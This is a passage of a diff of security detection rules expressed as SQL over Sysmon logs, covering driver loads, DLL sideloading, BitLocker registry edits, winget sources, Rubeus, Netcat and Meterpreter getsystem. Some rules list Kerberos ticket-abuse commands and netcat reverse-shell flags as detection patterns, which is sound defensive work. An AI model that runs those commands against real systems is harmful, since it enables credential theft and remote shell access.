POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE 
'\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of winget to add new potentially suspicious download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN 
('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "status": "test", - "description": "Detects a driver load from a temporary directory", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast 
%' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of Netcat. 
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Unknown" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE 
'\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "Potential Suspicious Activity Using SeCEdit", + "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects potential suspicious behaviour using secedit.exe. 
Such as exporting or modifying the security policy", + "author": "Janantha Marasinghe", "tags": [ - "attack.defense_evasion", + "attack.discovery", "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
(Image LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_secedit_execution.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", + "status": "test", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.persistence", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE 